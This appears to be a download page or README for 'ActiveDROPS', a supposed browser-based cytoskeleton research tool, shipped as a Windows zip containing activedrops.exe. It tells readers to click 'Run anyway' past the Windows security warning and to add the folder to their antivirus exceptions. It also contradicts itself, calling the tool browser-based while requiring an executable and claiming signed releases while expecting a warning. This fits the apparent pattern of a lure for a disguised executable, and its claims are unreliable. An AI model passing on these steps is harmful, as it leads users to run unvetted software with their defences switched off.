Download Latest Release

🎯 What Is ActiveDROPS?

ActiveDROPS is a research tool that runs in your web browser. It helps scientists study the tiny structures inside living cells called the cytoskeleton. You do not need to know how to code or install complex software. You just need a computer and a modern web browser.

The program lets you compare motor sequences, run biochemical experiments, and recombine sequences. Think of it as a digital laboratory bench for exploring how cells move and change shape.

🚀 Getting Started

Follow these steps to start using ActiveDROPS right now.

Step 1: Download the Software

  1. Go to the ActiveDROPS Releases Page.
  2. Look for the latest release at the top of the page.
  3. Find the file named ActiveDROPS-Windows.zip under "Assets".
  4. Click the file name to download it to your computer.

Step 2: Unzip the File

  1. Open the folder where you saved the download (usually your Downloads folder).
  2. Right-click the ActiveDROPS-Windows.zip file.
  3. Choose "Extract All" from the menu.
  4. Select a destination folder (the default location works fine).
  5. Click "Extract".

Step 3: Run the Program

  1. Open the new folder called ActiveDROPS-Windows.
  2. Double-click the file named activedrops.exe.
  3. A window will open. Your web browser will also open with ActiveDROPS ready to use.

Tip: Windows may show a security warning. Click "More info" then "Run anyway". This is safe. We sign our releases with a digital certificate.

🧪 What You Can Do

ActiveDROPS helps you study three main areas of cellular research:

Motor-Sequence Comparisons Compare different molecular motor sequences side by side. See how small changes affect movement patterns. The program highlights differences and similarities automatically.

Biochemical Investigations Run virtual experiments on protein interactions. Test how molecules bind and separate under different conditions. Adjust temperature, pH, and concentration values with sliders.

Sequence-Recombination Experiments Combine parts of different sequences to create new hybrid molecules. Watch how these new structures behave in the simulation.

💻 System Requirements

Your computer needs these minimum specifications:

ComponentRequirement
Operating SystemWindows 10 or Windows 11 (64-bit)
ProcessorIntel Core i3 or AMD equivalent
Memory4 GB RAM
Storage500 MB free space
Display1280 x 720 resolution
Web BrowserLatest version of Chrome, Edge, or Firefox

The program works best with a dedicated graphics card, but it runs on integrated graphics too.

🔧 Troubleshooting

The program does not start. Make sure your antivirus is not blocking the file. Add the ActiveDROPS folder to your antivirus exceptions list. Restart your computer and try again.

The browser window does not open. Open your web browser manually. Type http://localhost:3000 in the address bar. Press Enter.

I see a blank white screen. Refresh the browser page. If that does not work, close the program window and restart activedrops.exe.

The simulation runs slowly. Close other programs that use a lot of memory, like video games or video editing software. Reduce the simulation quality in the Settings menu.

🗺️ How to Navigate

The main screen has three parts:

  • Left panel: Controls for your experiment. Change settings and run commands here.
  • Center view: The main visualization window. Watch the simulation play out in real time.
  • Right panel: Data and results. See numbers, graphs, and sequence information.

Click the tabs at the top to switch between the three research modes: Motor Compare, Biochemistry, and Recombine.

📁 Working with Files

ActiveDROPS saves your work as standard file types:

  • Sequences: .fasta format
  • Results: .csv and .json formats
  • Screenshots: .png format

To load a file, click the folder icon in the left panel. To save your work, click the disk icon. You can also drag and drop files from your desktop into the browser window.

🔄 Updating the Software

  1. Visit the releases page again.
  2. Download the newest ActiveDROPS-Windows.zip file.
  3. Extract it to a new folder (do not overwrite your old folder).
  4. Run the new activedrops.exe.

Your saved files stay in your Documents folder and are not affected by updates.
